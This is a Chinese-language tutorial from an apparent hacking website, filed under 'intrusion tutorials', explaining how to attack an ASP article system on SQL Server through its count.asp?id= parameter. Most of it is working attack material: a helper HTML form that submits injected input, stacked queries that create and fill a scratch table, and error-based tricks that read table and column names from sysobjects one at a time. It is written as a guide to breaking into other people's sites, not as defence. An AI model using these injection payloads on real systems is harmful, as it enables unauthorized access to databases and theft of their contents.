奥运倒计时: 设为首页 加入收藏
点击进入太平洋安全网首页
论坛登陆 用户名: 密码:
首页 新闻资讯 文章中心 黑客资源 黑客点睛 安全防护 软件下载 动画教程 商城中心 技术问答 论坛社区
文章 下载 图片
文章   | 电脑知识 | 网络知识 | 菜鸟入门 | 入侵教程 | 黑客攻防 | 黑客编程 | 原创精华 | 黑客人物 | 黑客技术 | 提权技术 | 跨站技术 | 渗透技术 | 鸽子专题 |
 您现在的位置: 太平洋安全网 >> 文章 >> 入侵教程 >> 正文

网站SQL脚本注入的不常见方法

作者:二少    文章来源:互联网    点击数:    更新时间:2008-5-6
全站文章系统采用FSO静态生成的HTML文件来显示,这样做的好处一来可以减轻服务器负担,提高访问速度。二是阻止SQL注入式的攻击...

文章系统原理:
全部文章均在数据库存有一个副本。另处根据模板生成一个HTML页面。
攻击方法:查看源文件,里面是否有通过JS来调用页面。
如调用<script language="javascript" src="count.asp?id=1552"></script>来更新文章的浏览次数。

我们就可以来试一下可否注入:
http://服务域名/count.asp?id=1552’
看是否出错。如出错说明有注入漏洞,可采取正常攻击

在本机建立一个post.htm的文件和log.txt的文本文件(用于记录用)

post.htm内容:方便输入…
复制内容到剪贴板代码:
&lt;iframe name=p src=# width=800 height=350 frameborder=0&gt;&lt;/iframe&gt;
&lt;br&gt;
&lt;form action=http://test.com/count.asp target=p&gt;
&lt;input name="id" value="1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status&gt;0);--" style="width:750"&gt;
&lt;input type=submIT value="&gt;&gt;&gt;"&gt;
&lt;input type=hidden name=fno value="2, 3"&gt;
&lt;/form&gt;
对于SQL SERVER服务器可以这样判断:在1552后加一分号,如正常可能是SQL SERVER对于这类数据库可以先建一个表id=1552;create table aaa(aaa char(20));--

然后插入一条记录:id=1552;insert into aaa values(’test’);--

再之后枚举出他的数据表名:

id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status&gt;0);--

这是将第一个表名更新到aaa的字段处。

id=1552 and exists(select * from aaa where aaa>5)就会报错,多数情况会将表名直接读出:Microsoft OLE DB Provider for SQL Server 错误 ’80040e07’, 将 varchar 值 ’vote’ 转换为数据类型为 int 的列时发生语法错误。 

/search.asp,行21

其中vote就是表名:

也可以先猜出一个表名,再把(select top 1 name from sysobjects where xtype=’u’ and status>0)的值更新到那个表的一条记录中去。通过网页显示。

读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>’刚才得到的表名’)。

id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status&gt;0 and name&lt;&gt;’vote’);--

然后id=1552 and exists(select * from aaa where aaa>5)读出第二个表,一个个的读出,直到没有为止。

读字段:

id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),1));--

然后id=1552 and exists(select * from aaa where aaa>5)出错,得到字段名id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),2));--然后id=1552 and exists(select * from aaa where aaa>5)出错,得到字段名。

……类推……
文章录入:放弃    责任编辑:放弃 
  • 上一篇文章:

  • 下一篇文章:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
     推荐文章
    固顶文章利用系统漏洞轻轻松松绕过你的验证码
    推荐文章在网页里挂上代码的技巧(图)
    推荐文章推荐:用存储过程一样搞定服务器
    推荐文章完整XSS wrom入侵流程
    推荐文章意外拿下jsp服务器
    推荐文章高手解析如何入侵3389
    推荐文章我是如何黑掉PacketStorm论坛的
    推荐文章看紧你的3306端口,一次通过mysql的检测
     热门文章
    推荐文章推荐:用存储过程一样搞定服务器
    推荐文章浅析浪人文章系统V2.3
    推荐文章扔掉工具,让你飞速学会手工注入
     本站推荐

    关于我们 | 联系方法 | 招聘信息 | 加入会员 | 诚征代理 | 广告服务 | 欢迎投稿 | 站长信箱 | 友情链接 | 网站地图
    24小时客服:0374-7126138 技术支持:0374-7126138 投诉电话:0374-7967536
    客服QQ:883039 售后QQ:827520 技术QQ:78305152 投稿-商业:576880739
    Copyright 太平洋科技 2003-2007 版权所有 All Rights Reserved
      许可证号:豫ICP备07005385号